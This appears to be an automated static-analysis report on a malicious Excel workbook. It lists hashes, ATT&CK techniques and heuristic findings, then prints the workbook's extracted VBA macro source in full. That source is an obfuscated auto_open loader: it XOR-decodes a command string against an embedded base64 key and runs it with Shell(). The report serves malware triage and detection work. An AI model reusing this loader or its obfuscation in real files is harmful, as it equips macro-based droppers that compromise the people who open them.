Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2cf218d8c2ed9129…

MALICIOUS

Office (OOXML)

Size: 1.38 MB
Created: 2020-06-12 20:59:23 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-07-10
MD5: ba95d53554e901a5b62b7c4a5816771a
SHA-1: dea071d25eebcaf16a4ab7ceea4040abc5652974
SHA-256: 2cf218d8c2ed9129334789bfc0b5277e8616242e00c0006183940d10711ca9ab
Risk score: 138

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is an Excel document containing VBA macros, including an Auto_Open macro that calls the Shell() function, which indicates an attempt to execute arbitrary code when the workbook is opened. The obfuscated VBA code and the macro-related files extracted from the sample suggest downloader or dropper functionality. The document body, while appearing benign, is likely a lure to encourage user interaction with the malicious add-in.

Heuristics (6 findings)

  • VBA project inside OOXML (severity: medium; 3 related findings; rule OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (severity: critical; rule OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script
    ((59 Xor 114) + (19 Xor 13)), ((135 Xor 17) + (16 Xor 3)), ((1 Xor 10) + (50 Xor 231)), (4 + 149), (135 Xor 16), ((10 Xor 4) + 13), ((19 Xor 56) + 70), 132, (24 + (77 Xor 16)), 24, 200, ((4 Xor 0) + 31), (70 Xor 1), ((3 Xor 15) + 3), ((35 Xor 11) + (37 Xor 11)), (15 + 24), 154, (77 + (26 Xor 104)), (96 + (8 Xor 4)), 81, (3 + (4 Xor 15)), 162, (99 + (7 Xor 16)), ((23 Xor 9) + 168), (31 Xor 37), (12 Xor 31), (216 Xor 1)), (82 Xor 142)) + ZIfQhhZQoDxRIH + pBzimzueIFlz(Array((18 Xor 15)), ((236 Xor  …
    Shell zGBJPPSjXi, 1
    MsgBox (zGBJPPSjXi)
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro (severity: low; rule OLE_VBA_AUTO)
    Auto_Open macro
    Matched line in script
    Private mpXdQOsHozQ((0 Xor 0) To 127) As Byte
    Sub auto_open()
    Dim xoioTLJARSTlIT As String
  • Hidden worksheet (severity: low; rule OOXML_HIDDEN_SHEET)
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Suspicious extracted artifact (severity: info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 12604 bytes
SHA-256: dddc9f2b2ccb70a9652a32f494130b3d872e20215d114f85f1d131889f5fa689
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
"Use this line to add the document variable to you file and then remove these comments."
ActiveDocument.Variables.Add Name:="cAXlWbmgxhemFgPV", Value:="jCA4FlvJkR+ZBxjP7O+fTqe748em3jiIbARtoYZ2OjVWTgdBX5VNPO17nwDp6sseVZKmFY8A474IWWQC3pzNGaz2qALGtxrg+HWHtUfGcf/Lrfers45F+5i8EYpR82Ios3nwjIDzCGgAX0QnWFzgLU1Zh5zCmxeulY13jP8DFuIg8Rff3ZyhBFkKJpHbqaY1XW0nAetwd4+YIabB2QhRayGmsrKThrKhuwSI+acUj+ouzBU/OwtX4+SwYK649j0LFAAsay0S+6bFRPDlFpDt0cV2SRhvoezOZqNRXqgdZWNL+D6wgNYeiaLg53oC11U1pkw3fTlB89MJcSPEE6pfM/46"
Private gqRlbLvysEqmz       As Boolean
Private MEOLbTXFZPSM((0 + 0) To 63) As Byte
Private mpXdQOsHozQ((0 Xor 0) To 127) As Byte
Sub auto_open()
Dim xoioTLJARSTlIT As String
Dim zGBJPPSjXi As String
xoioTLJARSTlIT = pBzimzueIFlz(Array(((1 Xor 194) + 33), (83 + (1 Xor 0)), (76 + (0 Xor 0)), (29 Xor 123), (5 + 35), 243, ((46 Xor 116) + (85 Xor 49)), ((3 Xor 51) + (0 Xor 0)), ((65 Xor 11) + 167), 110, ((11 Xor 114) + 6), (86 + 84), (116 Xor 253), 193, 241, (35 Xor 8), 211, (125 Xor 233), ((53 Xor 118) + 63), ((31 Xor 60) + (31 Xor 157)), (151 Xor 82), ((49 Xor 92) + 132), (81 Xor 0)), 0) & pBzimzueIFlz(Array((214 Xor 48), ((8 Xor 0) + (0 Xor 0)), (33 + 64), (19 + (0 Xor 2)), ((12 Xor 3) + 128), (87 Xor 161), 5, 11), 23)
Dim ZIfQhhZQoDxRIH As String
ZIfQhhZQoDxRIH = pBzimzueIFlz(Array(((21 Xor 120) + (3 Xor 10)), 108, 18, 82, (48 + (0 Xor 2)), (37 Xor 31)), ((1 Xor 20) + 10)) & pBzimzueIFlz(Array((195 Xor 36), ((4 Xor 8) + 50), (18 + 78), (148 + 3), (14 Xor 20), (184 + (17 Xor 47)), (59 + (21 Xor 50)), 136, ((140 Xor 30) + 36), ((12 Xor 25) + 141), ((26 Xor 123) + 15), (6 Xor 55), (129 Xor 118), (209 + 13), (57 Xor 2), 255, 115, (172 + (13 Xor 43))), ((17 Xor 13) + (9 Xor 0)))
zGBJPPSjXi = pBzimzueIFlz(Array((69 Xor 152), ((20 Xor 40) + (23 Xor 62)), 61, (0 Xor 68), (16 Xor 61), 181, 188, (189 + (0 Xor 0)), ((70 Xor 21) + (35 Xor 0)), 219, ((59 Xor 123) + 83), (76 Xor 150), (110 + (1 Xor 2)), 174, ((19 Xor 59) + (127 Xor 213)), (23 + 95), (40 + 100), (128 Xor 88), 88, ((44 Xor 160) + (13 Xor 73)), (187 + (6 Xor 39)), (31 Xor 54), (77 Xor 239), ((12 Xor 21) + 5), (75 + 61), 152, (202 Xor 19), (121 Xor 247), ((8 Xor 1) + (186 Xor 4)), (153 Xor 79), (28 + 146), 43, ((3 Xor 39) + (39 Xor 87)), ((72 Xor 232) + 74), 209, (91 + 21), _
(2 + (121 Xor 157)), (9 + (98 Xor 10)), ((5 Xor 9) + (47 Xor 253)), ((8 Xor 23) + 8), (70 + 10), (88 Xor 142), 26, 133, (112 Xor 136), ((83 Xor 193) + (44 Xor 123)), 156, 102, (44 Xor 20), ((33 Xor 9) + 71), (20 Xor 39), (36 + 9), ((13 Xor 24) + 47), (19 + (9 Xor 7)), (96 Xor 28), ((2 Xor 45) + (58 Xor 73)), (20 Xor 64), ((19 Xor 33) + 11), 56, ((109 Xor 196) + (66 Xor 9)), (50 + 157), (25 + 201), ((20 Xor 91) + 103), (25 Xor 96), 193, 229, (115 Xor 140), (13 Xor 21), ((5 Xor 3) + (60 Xor 216)), (92 + 58)), (55 + (0 Xor 0))) & pBzimzueIFlz(Array((44 + 67), _
((74 Xor 17) + 24), (28 Xor 222), ((0 Xor 0) + 8), (86 Xor 233), ((35 Xor 124) + (3 Xor 16)), (60 + (96 Xor 12)), (96 + 144), (176 Xor 99), ((110 Xor 193) + (15 Xor 27)), (86 Xor 56), (34 + 26), (25 Xor 112), ((12 Xor 63) + (5 Xor 26)), (20 Xor 165), (37 Xor 173), (166 + 42), (152 Xor 77), (19 Xor 82), (25 Xor 33), (0 + (0 Xor 0)), (0 + 9), (53 + 26), (76 Xor 194), ((3 Xor 7) + 0), 89, (83 + 133), 253, ((21 Xor 87) + 1), 229, ((92 Xor 3) + 78), (109 + 67), (89 + (5 Xor 17)), 63, (30 + 1), (6 + (2 Xor 0)), ((103 Xor 28) + 13), 246, (152 Xor 69), ((18 Xor 124) + (98 Xor 20)), _
((4 Xor 1) + 227), (125 Xor 163), (92 Xor 146), (102 + (28 Xor 104)), ((31 Xor 35) + 36), (166 Xor 104), (5 + (135 Xor 12)), ((21 Xor 12) + (88 Xor 234)), 113, ((70 Xor 49) + (2 Xor 50)), 205), ((57 Xor 120) + 60)) + xoioTLJARSTlIT + pBzimzueIFlz(Array((4 + (2 Xor 7)), ((24 Xor 171) + 45), (36 Xor 17), (1 + (18 Xor 5))), (63 + 113)) + ZIfQhhZQoDxRIH + pBzimzueIFlz(Array((21 Xor 9), ((3 Xor 13) + (12 Xor 24)), 108, ((2 Xor 0) + 193), 148, ((9 Xor 100) + 114), (14 Xor 25), 203, (170 + 32), (88 Xor 221), ((27 Xor 44) + 30), 110, ((40 Xor 108) + (7 Xor 51)), _
(78 Xor 34), 12, (36 + (16 Xor 50)), (50 Xor 72), 123, ((59 Xor 87) + 41), (44 + 150), ((101 Xor 227) + 36), ((9 Xor 0) + (1 Xor 43)), (26 + 137), (73 Xor 216), 111, 252, ((38 Xor 75) + 27), (7 + 234), ((3 Xor 6) + 166), (14 + 11), 59, 117, ((3 Xor 10) + (5 Xor 0)), (113 Xor 188), ((68 Xor 1) + 135), (187 + (29 Xor 53)), (5 + (1 Xor 31)), ((0 Xor 2) + (42 Xor 243)), 52, ((27 Xor 5) + 31)), (76 + 104)) & pBzimzueIFlz(Array((87 + (108 Xor 234)), (24 + 81), (0 Xor 12), ((4 Xor 3) + (0 Xor 5)), ((0 Xor 5) + 32), 168, (45 Xor 124), ((41 Xor 4) + 175), 233, (24 + (125 Xor 224)), _
((59 Xor 114) + (19 Xor 13)), ((135 Xor 17) + (16 Xor 3)), ((1 Xor 10) + (50 Xor 231)), (4 + 149), (135 Xor 16), ((10 Xor 4) + 13), ((19 Xor 56) + 70), 132, (24 + (77 Xor 16)), 24, 200, ((4 Xor 0) + 31), (70 Xor 1), ((3 Xor 15) + 3), ((35 Xor 11) + (37 Xor 11)), (15 + 24), 154, (77 + (26 Xor 104)), (96 + (8 Xor 4)), 81, (3 + (4 Xor 15)), 162, (99 + (7 Xor 16)), ((23 Xor 9) + 168), (31 Xor 37), (12 Xor 31), (216 Xor 1)), (82 Xor 142)) + ZIfQhhZQoDxRIH + pBzimzueIFlz(Array((18 Xor 15)), ((236 Xor 20) + (0 Xor 9)))
Shell zGBJPPSjXi, 1
MsgBox (zGBJPPSjXi)
End Sub
Public Function RPzufDpdLuZ(ByVal xpCsaERmJmtwnI As String) As Byte()
If Not gqRlbLvysEqmz Then uYDHRsaHLfVLwz
Dim KVfaohzuxq() As Byte: KVfaohzuxq = FMFiavfWkO(xpCsaERmJmtwnI)
Dim KddmJDRPMvp As Long: KddmJDRPMvp = UBound(KVfaohzuxq) + ((0 Xor 0) + 1)
If KddmJDRPMvp Mod (0 Xor 4) <> ((0 Xor 0) + (0 Xor 0)) Then Err.Raise vbObjectError, , ""
Do While KddmJDRPMvp > ((0 Xor 0) + 0)
If KVfaohzuxq(KddmJDRPMvp - 1) <> Asc("=") Then Exit Do
KddmJDRPMvp = KddmJDRPMvp - (1 Xor 0)
Loop
Dim IZgjIsManlh As Long: IZgjIsManlh = (KddmJDRPMvp * (1 + (2 Xor 0))) \ (2 + 2)
Dim lOyLMtkKpya() As Byte
ReDim lOyLMtkKpya(((0 Xor 0) + 0) To IZgjIsManlh - 1) As Byte
Dim WqczwdFUDQC As Long
Dim TerVODndEi As Long
Do While WqczwdFUDQC < KddmJDRPMvp
Dim VTMlKtKUmdV As Byte: VTMlKtKUmdV = KVfaohzuxq(WqczwdFUDQC): WqczwdFUDQC = WqczwdFUDQC + (0 Xor 1)
Dim uoYRzGbRfBufO As Byte: uoYRzGbRfBufO = KVfaohzuxq(WqczwdFUDQC): WqczwdFUDQC = WqczwdFUDQC + (1 Xor 0)
Dim bQwdInPOntCVY As Byte: If WqczwdFUDQC < KddmJDRPMvp Then bQwdInPOntCVY = KVfaohzuxq(WqczwdFUDQC): WqczwdFUDQC = WqczwdFUDQC + 1 Else bQwdInPOntCVY = Asc("A")
Dim dUKoeyhUzEBq As Byte: If WqczwdFUDQC < KddmJDRPMvp Then dUKoeyhUzEBq = KVfaohzuxq(WqczwdFUDQC): WqczwdFUDQC = WqczwdFUDQC + ((0 Xor 0) + (1 Xor 0)) Else dUKoeyhUzEBq = Asc("A")
If VTMlKtKUmdV > (90 + 37) Or uoYRzGbRfBufO > (40 Xor 87) Or bQwdInPOntCVY > (24 Xor 103) Or dUKoeyhUzEBq > 127 Then _
Err.Raise vbObjectError, , ""
Dim SzcsydJXlO As Byte: SzcsydJXlO = mpXdQOsHozQ(VTMlKtKUmdV)
Dim HtOoBeWkUpFaL As Byte: HtOoBeWkUpFaL = mpXdQOsHozQ(uoYRzGbRfBufO)
Dim ZKFXlNixrXoJR As Byte: ZKFXlNixrXoJR = mpXdQOsHozQ(bQwdInPOntCVY)
Dim MCijTyLTnqo As Byte: MCijTyLTnqo = mpXdQOsHozQ(dUKoeyhUzEBq)
If SzcsydJXlO > ((10 Xor 52) + (1 Xor 0)) Or HtOoBeWkUpFaL > (7 Xor 56) Or ZKFXlNixrXoJR > (23 Xor 40) Or MCijTyLTnqo > ((14 Xor 30) + 47) Then _
Err.Raise vbObjectError, , ""
Dim XnxxAjPpSI As Byte: XnxxAjPpSI = (SzcsydJXlO * (0 + 4)) Or (HtOoBeWkUpFaL \ &H10)
Dim UWiIjKvIfCaza As Byte: UWiIjKvIfCaza = ((HtOoBeWkUpFaL And &HF) * &H10) Or (ZKFXlNixrXoJR \ ((1 Xor 5) + (0 Xor 0)))
Dim TFtaTbxzMnQR As Byte: TFtaTbxzMnQR = ((ZKFXlNixrXoJR And (0 Xor 3)) * &H40) Or MCijTyLTnqo
lOyLMtkKpya(TerVODndEi) = XnxxAjPpSI: TerVODndEi = TerVODndEi + (1 + (0 Xor 0))
If TerVODndEi < IZgjIsManlh Then lOyLMtkKpya(TerVODndEi) = UWiIjKvIfCaza: TerVODndEi = TerVODndEi + (1 + 0)
If TerVODndEi < IZgjIsManlh Then lOyLMtkKpya(TerVODndEi) = TFtaTbxzMnQR: TerVODndEi = TerVODndEi + (0 Xor 1)
Loop
RPzufDpdLuZ = lOyLMtkKpya
End Function
Private Sub uYDHRsaHLfVLwz()
Dim mtsmAhDpAIj As Integer, AHlVJicJXTxrC As Integer
AHlVJicJXTxrC = (0 + 0)
For mtsmAhDpAIj = Asc("A") To Asc("Z"): MEOLbTXFZPSM(AHlVJicJXTxrC) = mtsmAhDpAIj: AHlVJicJXTxrC = AHlVJicJXTxrC + (0 Xor 1): Next
For mtsmAhDpAIj = Asc("a") To Asc("z"): MEOLbTXFZPSM(AHlVJicJXTxrC) = mtsmAhDpAIj: AHlVJicJXTxrC = AHlVJicJXTxrC + 1: Next
For mtsmAhDpAIj = Asc("0") To Asc("9"): MEOLbTXFZPSM(AHlVJicJXTxrC) = mtsmAhDpAIj: AHlVJicJXTxrC = AHlVJicJXTxrC + 1: Next
MEOLbTXFZPSM(AHlVJicJXTxrC) = Asc("+"): AHlVJicJXTxrC = AHlVJicJXTxrC + ((0 Xor 0) + 1)
MEOLbTXFZPSM(AHlVJicJXTxrC) = Asc("/"): AHlVJicJXTxrC = AHlVJicJXTxrC + ((0 Xor 0) + (0 Xor 1))
For AHlVJicJXTxrC = ((0 Xor 0) + 0) To 127: mpXdQOsHozQ(AHlVJicJXTxrC) = (216 Xor 39): Next
For AHlVJicJXTxrC = (0 Xor 0) To (25 Xor 38): mpXdQOsHozQ(MEOLbTXFZPSM(AHlVJicJXTxrC)) = AHlVJicJXTxrC: Next
gqRlbLvysEqmz = True
End Sub
Private Function FMFiavfWkO(ByVal xpCsaERmJmtwnI As String) As Byte()
Dim HtOoBeWkUpFaL() As Byte: HtOoBeWkUpFaL = xpCsaERmJmtwnI
Dim BfLvKxTqutd As Long: BfLvKxTqutd = (UBound(HtOoBeWkUpFaL) + (1 + 0)) \ ((0 Xor 2) + (0 Xor 0))
If BfLvKxTqutd = (0 + 0) Then FMFiavfWkO = HtOoBeWkUpFaL: Exit Function
Dim ZKFXlNixrXoJR() As Byte
ReDim ZKFXlNixrXoJR((0 + (0 Xor 0)) To BfLvKxTqutd - (1 + 0)) As Byte
Dim ZdQBGQbGaAdm As Long
For ZdQBGQbGaAdm = ((0 Xor 0) + (0 Xor 0)) To BfLvKxTqutd - (0 + (0 Xor 1))
Dim mtsmAhDpAIj As Long: mtsmAhDpAIj = HtOoBeWkUpFaL(2 * ZdQBGQbGaAdm) + (193 Xor 449) * CLng(HtOoBeWkUpFaL((1 Xor 3) * ZdQBGQbGaAdm + ((0 Xor 0) + (0 Xor 1))))
If mtsmAhDpAIj >= (99 Xor 355) Then mtsmAhDpAIj = Asc("?")
ZKFXlNixrXoJR(ZdQBGQbGaAdm) = mtsmAhDpAIj
Next
FMFiavfWkO = ZKFXlNixrXoJR
End Function
Private Function pBzimzueIFlz(CMYwxKsJCjVmJ As Variant, tRZITegTRXXXz As Integer)
Dim YuCDMOfyUe As String
Dim lzZPDCAOjO() As Byte
lzZPDCAOjO = RPzufDpdLuZ(ActiveDocument.Variables("cAXlWbmgxhemFgPV"))
YuCDMOfyUe = ""
For AHlVJicJXTxrC = LBound(CMYwxKsJCjVmJ) To UBound(CMYwxKsJCjVmJ)
YuCDMOfyUe = YuCDMOfyUe & Chr(lzZPDCAOjO(AHlVJicJXTxrC + tRZITegTRXXXz) Xor CMYwxKsJCjVmJ(AHlVJicJXTxrC))
Next
pBzimzueIFlz = YuCDMOfyUe
End Function

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 36864 bytes
SHA-256: 098e78540d1af5c57f98dd84cebffd6efb7030ceccd89a4c4f3f177c61d506c0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).